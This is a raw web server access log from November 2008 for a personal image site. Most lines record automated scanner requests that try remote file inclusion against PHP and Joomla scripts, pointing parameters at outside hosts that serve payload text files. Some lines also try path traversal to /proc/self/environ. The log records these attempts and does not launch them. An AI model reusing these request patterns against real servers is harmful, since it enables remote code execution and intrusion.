70.85.149.242 - - [15/Nov/2008:18:45:03 -0600] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.inmirae.co.kr/zboard/icon/id.txt%0D? HTTP/1.1" 404 329 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
202.64.130.106 - - [15/Nov/2008:18:47:00 -0600] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.803"
202.64.130.106 - - [15/Nov/2008:18:47:00 -0600] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
70.85.149.242 - - [15/Nov/2008:18:49:32 -0600] "GET /logs/access_log.1214438400/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.inmirae.co.kr/zboard/icon/id.txt%0D? HTTP/1.1" 404 351 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
70.85.149.242 - - [15/Nov/2008:18:49:32 -0600] "GET /logs/access_log.1214956800/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.inmirae.co.kr/zboard/icon/id.txt%0D? HTTP/1.1" 404 351 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
213.207.110.102 - - [15/Nov/2008:18:53:55 -0600] "GET /logs/access_log.1223251200//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.irontonforge.com/McN/readme.txt?? HTTP/1.1" 404 321 "-""Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
213.207.110.102 - - [15/Nov/2008:18:53:55 -0600] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.irontonforge.com/McN/readme.txt?? HTTP/1.1" 404 294 "-""Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
213.207.110.102 - - [15/Nov/2008:18:53:57 -0600] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.irontonforge.com/McN/readme.txt?? HTTP/1.1" 404 299 "-""Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
213.207.110.102 - - [15/Nov/2008:18:56:32 -0600] "GET /logs/access_log.1219622400//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.irontonforge.com/McN/readme.txt?? HTTP/1.1" 404 321 "-""Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
70.85.149.242 - - [15/Nov/2008:18:57:47 -0600] "GET //common/db.php?commonpath=http://www.inmirae.co.kr/zboard/icon/id.txt%0D? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
70.85.149.242 - - [15/Nov/2008:18:57:47 -0600] "GET /logs/access_log.1217635200//common/db.php?commonpath=http://www.inmirae.co.kr/zboard/icon/id.txt%0D? HTTP/1.1" 404 325 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
70.85.149.242 - - [15/Nov/2008:18:57:51 -0600] "GET /logs//common/db.php?commonpath=http://www.inmirae.co.kr/zboard/icon/id.txt%0D? HTTP/1.1" 404 303 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
85.119.152.5 - - [15/Nov/2008:18:58:23 -0600] "GET /logs//?sourcedir=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.0" 200 106970 "-""libwww-perl/5.48"
85.119.152.5 - - [15/Nov/2008:18:58:23 -0600] "GET //?sourcedir=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.0" 200 1231 "-""libwww-perl/5.48"
84.234.72.255 - - [15/Nov/2008:19:00:53 -0600] "GET /logs/access_log.1211846400/errors.php?error=http://indorfi.t35.com/idFx.txt%0D? HTTP/1.1" 404 321 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
84.234.72.255 - - [15/Nov/2008:19:00:53 -0600] "GET /errors.php?error=http://indorfi.t35.com/idFx.txt%0D? HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
84.234.72.255 - - [15/Nov/2008:19:00:53 -0600] "GET /logs/errors.php?error=http://indorfi.t35.com/idFx.txt%0D? HTTP/1.1" 404 299 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
24.143.139.77 - - [15/Nov/2008:19:00:58 -0600] "GET /logs/access_log.1212883200//errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
24.143.139.77 - - [15/Nov/2008:19:00:59 -0600] "GET //errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
24.143.139.77 - - [15/Nov/2008:19:00:59 -0600] "GET /logs//errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
213.193.220.6 - - [15/Nov/2008:19:01:04 -0600] "GET /logs/contenido.php?sec=http://www.samilglass.com/images/bratid.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
213.193.220.6 - - [15/Nov/2008:19:01:04 -0600] "GET /contenido.php?sec=http://www.samilglass.com/images/bratid.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
91.206.132.1 - - [15/Nov/2008:19:01:22 -0600] "GET /logs/access_log.1215302400/modify.php?dir_module=http://www.samnus.com.mx/chat/inc/cmses/id.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
84.234.72.255 - - [15/Nov/2008:19:01:36 -0600] "GET /logs/access_log.1206144000/errors.php?error=http://indorfi.t35.com/idFx.txt%0D? HTTP/1.1" 404 321 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
91.206.132.1 - - [15/Nov/2008:19:01:56 -0600] "GET /logs/access_log.1214438400/modify.php?dir_module=http://www.samnus.com.mx/chat/inc/cmses/id.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
201.41.39.74 - - [15/Nov/2008:19:03:44 -0600] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
201.41.39.74 - - [15/Nov/2008:19:03:44 -0600] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
209.172.44.52 - - [15/Nov/2008:19:05:10 -0600] "GET /logs//administrator/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.fm24forum.de/phpBB2/cache/i?? HTTP/1.1" 404 353 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
209.172.44.52 - - [15/Nov/2008:19:05:10 -0600] "GET /logs/errors.php?error=http://www.fm24forum.de/phpBB2/cache/i?? HTTP/1.1" 404 299 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
209.172.44.52 - - [15/Nov/2008:19:05:10 -0600] "GET /logs//administrator/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 353 "-""XXXXXX"
209.172.44.52 - - [15/Nov/2008:19:05:10 -0600] "GET /logs//administrator/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 353 "-""XXXXXX"
209.172.44.52 - - [15/Nov/2008:19:05:10 -0600] "GET //administrator/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.fm24forum.de/phpBB2/cache/i?? HTTP/1.1" 404 348 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
209.172.44.52 - - [15/Nov/2008:19:05:10 -0600] "GET /errors.php?error=http://www.fm24forum.de/phpBB2/cache/i?? HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
209.172.44.52 - - [15/Nov/2008:19:05:10 -0600] "GET //administrator/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 348 "-""XXXXXX"
209.172.44.52 - - [15/Nov/2008:19:05:10 -0600] "GET //administrator/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 348 "-""XXXXXX"
193.27.204.51 - - [15/Nov/2008:19:11:03 -0600] "GET /logs/access_log.1203206400/ws/login.php?includedir=http://www.triebstein.de/assets/roll?%0D?? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
193.27.204.51 - - [15/Nov/2008:19:11:03 -0600] "GET /ws/login.php?includedir=http://www.triebstein.de/assets/roll?%0D?? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
193.27.204.51 - - [15/Nov/2008:19:11:03 -0600] "GET /logs/ws/login.php?includedir=http://www.triebstein.de/assets/roll?%0D?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
91.103.204.230 - - [15/Nov/2008:19:12:04 -0600] "GET /logs/access_log.1216425600/home.php?action=http://www.samilglass.com/images/bratid.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.79"
91.103.204.230 - - [15/Nov/2008:19:12:05 -0600] "GET /home.php?action=http://www.samilglass.com/images/bratid.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.79"
91.103.204.230 - - [15/Nov/2008:19:12:05 -0600] "GET /logs/home.php?action=http://www.samilglass.com/images/bratid.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
91.103.204.230 - - [15/Nov/2008:19:12:05 -0600] "GET /logs/access_log.1215302400/home.php?action=http://www.samilglass.com/images/bratid.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.79"
82.194.85.198 - - [15/Nov/2008:19:13:04 -0600] "GET /public_html/components/e404.php?e404=http://www.skilful.nu/images/id.txt? HTTP/1.1" 404 315 "-""libwww-perl/5.811"
61.109.250.156 - - [15/Nov/2008:19:13:52 -0600] "GET /logs/access_log.1218758400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.hondooo.de//components/com_extcalendar/lib/data/copyright.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
61.109.250.156 - - [15/Nov/2008:19:13:52 -0600] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.hondooo.de//components/com_extcalendar/lib/data/copyright.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
61.109.250.156 - - [15/Nov/2008:19:13:52 -0600] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.hondooo.de//components/com_extcalendar/lib/data/copyright.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
61.109.250.156 - - [15/Nov/2008:19:13:57 -0600] "GET /logs/access_log.1217203200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.hondooo.de//components/com_extcalendar/lib/data/copyright.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
91.103.204.230 - - [15/Nov/2008:19:14:10 -0600] "GET /logs/home.php?pagina=http://www.samilglass.com/images/bratid.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
91.103.204.230 - - [15/Nov/2008:19:14:11 -0600] "GET /home.php?pagina=http://www.samilglass.com/images/bratid.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.79"
207.250.188.51 - - [15/Nov/2008:19:15:16 -0600] "GET /logs//atom.php5?page=http://dcfcsite.org/fx29id.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
207.250.188.51 - - [15/Nov/2008:19:15:16 -0600] "GET /logs/access_log.1216598400//atom.php5?page=http://dcfcsite.org/fx29id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
207.250.188.51 - - [15/Nov/2008:19:15:16 -0600] "GET /logs/access_log.1217289600//atom.php5?page=http://dcfcsite.org/fx29id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
193.27.204.51 - - [15/Nov/2008:19:15:38 -0600] "GET /logs/access_log.1201824000/ws/login.php?includedir=http://www.triebstein.de/assets/roll?%0D?? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
91.103.204.230 - - [15/Nov/2008:19:15:58 -0600] "GET /logs/access_log.1216425600/home.php?action=http://www.samilglass.com/images/bratid.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.79"
91.103.204.230 - - [15/Nov/2008:19:15:59 -0600] "GET /home.php?action=http://www.samilglass.com/images/bratid.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.79"
91.103.204.230 - - [15/Nov/2008:19:15:59 -0600] "GET /logs/home.php?action=http://www.samilglass.com/images/bratid.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
91.103.204.230 - - [15/Nov/2008:19:16:37 -0600] "GET /logs/access_log.1215302400/home.php?action=http://www.samilglass.com/images/bratid.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.79"
213.207.110.102 - - [15/Nov/2008:19:16:38 -0600] "GET /logs/access_log.1211846400/errors.php?error=http://www.irontonforge.com/McN/readme.txt?? HTTP/1.1" 404 321 "-""Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
213.207.110.102 - - [15/Nov/2008:19:16:38 -0600] "GET /errors.php?error=http://www.irontonforge.com/McN/readme.txt?? HTTP/1.1" 404 294 "-""Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
213.207.110.102 - - [15/Nov/2008:19:16:39 -0600] "GET /logs/errors.php?error=http://www.irontonforge.com/McN/readme.txt?? HTTP/1.1" 404 299 "-""Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
213.207.110.102 - - [15/Nov/2008:19:17:50 -0600] "GET /logs/access_log.1206144000/errors.php?error=http://www.irontonforge.com/McN/readme.txt?? HTTP/1.1" 404 321 "-""Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
66.249.65.134 - - [15/Nov/2008:19:18:56 -0600] "GET /robots.txt HTTP/1.1" 404 294 "-""Googlebot-Image/1.0"
66.249.65.134 - - [15/Nov/2008:19:18:57 -0600] "GET /costume/costume80.JPG HTTP/1.1" 200 67426 "-""Googlebot-Image/1.0"
193.27.204.51 - - [15/Nov/2008:19:20:28 -0600] "GET /logs/login.php?includedir=http://www.triebstein.de/assets/roll?%0D?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
193.27.204.51 - - [15/Nov/2008:19:20:28 -0600] "GET /login.php?includedir=http://www.triebstein.de/assets/roll?%0D?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
193.27.204.51 - - [15/Nov/2008:19:20:28 -0600] "GET /logs/access_log.1202860800/login.php?includedir=http://www.triebstein.de/assets/roll?%0D?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
193.27.204.51 - - [15/Nov/2008:19:20:37 -0600] "GET /logs/access_log.1207180800/login.php?includedir=http://www.triebstein.de/assets/roll?%0D?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
72.55.133.37 - - [15/Nov/2008:19:25:19 -0600] "GET /logs//appserv/main.php?appserv_root=http://elitewa.webng.com/22.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.811"
72.55.133.37 - - [15/Nov/2008:19:25:19 -0600] "GET /logs/access_log.1216425600//appserv/main.php?appserv_root=http://elitewa.webng.com/22.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.811"
72.55.133.37 - - [15/Nov/2008:19:25:19 -0600] "GET //appserv/main.php?appserv_root=http://elitewa.webng.com/22.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.811"
69.61.184.115 - - [15/Nov/2008:19:25:34 -0600] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://www.google.com/search?client=safari&rls=en&q=vintage+tattoo+flash&ie=UTF-8&oe=UTF-8""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.22"
69.61.184.115 - - [15/Nov/2008:19:25:34 -0600] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.22"
69.61.184.115 - - [15/Nov/2008:19:25:34 -0600] "GET /favicon.ico HTTP/1.1" 404 295 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.22"
69.61.184.115 - - [15/Nov/2008:19:25:34 -0600] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.22"
69.61.184.115 - - [15/Nov/2008:19:25:44 -0600] "GET /tattoo/set2.htm HTTP/1.1" 200 2286 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.22"
69.61.184.115 - - [15/Nov/2008:19:25:44 -0600] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.22"
69.61.184.115 - - [15/Nov/2008:19:25:44 -0600] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.22"
69.61.184.115 - - [15/Nov/2008:19:25:44 -0600] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.22"
69.61.184.115 - - [15/Nov/2008:19:25:44 -0600] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.22"
69.61.184.115 - - [15/Nov/2008:19:25:44 -0600] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.22"
69.61.184.115 - - [15/Nov/2008:19:25:44 -0600] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.22"
69.61.184.115 - - [15/Nov/2008:19:25:44 -0600] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.22"
69.61.184.115 - - [15/Nov/2008:19:25:44 -0600] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.22"
69.61.184.115 - - [15/Nov/2008:19:25:44 -0600] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.22"
69.61.184.115 - - [15/Nov/2008:19:25:46 -0600] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.22"
85.119.152.5 - - [15/Nov/2008:19:26:20 -0600] "GET /logs///program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.0" 404 337 "-""libwww-perl/5.48"
85.119.152.5 - - [15/Nov/2008:19:26:20 -0600] "GET ///program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.0" 404 332 "-""libwww-perl/5.48"
83.223.116.60 - - [15/Nov/2008:19:26:26 -0600] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.psshosting.com/tmp/idr.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
83.223.116.60 - - [15/Nov/2008:19:26:26 -0600] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.psshosting.com/tmp/idr.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
83.223.116.60 - - [15/Nov/2008:19:26:26 -0600] "GET /logs/access_log.1216684800//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.psshosting.com/tmp/idr.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
83.223.116.60 - - [15/Nov/2008:19:26:38 -0600] "GET /logs/access_log.1217116800//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.psshosting.com/tmp/idr.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
83.223.116.60 - - [15/Nov/2008:19:26:56 -0600] "GET /logs/access_log.1216684800//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.psshosting.com/tmp/idr.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
83.223.116.60 - - [15/Nov/2008:19:26:56 -0600] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.psshosting.com/tmp/idr.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
83.223.116.60 - - [15/Nov/2008:19:26:56 -0600] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.psshosting.com/tmp/idr.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
69.110.13.63 - - [15/Nov/2008:19:27:30 -0600] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://www.google.com/search?hl=en&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&hs=qGr&q=earl+brown+tattoo&btnG=Search""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
69.110.13.63 - - [15/Nov/2008:19:27:31 -0600] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
69.110.13.63 - - [15/Nov/2008:19:27:31 -0600] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
69.110.13.63 - - [15/Nov/2008:19:27:32 -0600] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
207.250.188.51 - - [15/Nov/2008:19:27:34 -0600] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://dcfcsite.org/fx29id.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
207.250.188.51 - - [15/Nov/2008:19:27:34 -0600] "GET /logs/access_log.1216512000//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://dcfcsite.org/fx29id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
69.110.13.63 - - [15/Nov/2008:19:27:35 -0600] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
69.110.13.63 - - [15/Nov/2008:19:27:39 -0600] "GET /tattoo/set1.htm HTTP/1.1" 200 2645 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
69.110.13.63 - - [15/Nov/2008:19:27:40 -0600] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
69.110.13.63 - - [15/Nov/2008:19:27:40 -0600] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
69.110.13.63 - - [15/Nov/2008:19:27:40 -0600] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
69.110.13.63 - - [15/Nov/2008:19:27:40 -0600] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
69.110.13.63 - - [15/Nov/2008:19:27:40 -0600] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
69.110.13.63 - - [15/Nov/2008:19:27:40 -0600] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
69.110.13.63 - - [15/Nov/2008:19:27:40 -0600] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
69.110.13.63 - - [15/Nov/2008:19:27:40 -0600] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
69.110.13.63 - - [15/Nov/2008:19:27:40 -0600] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
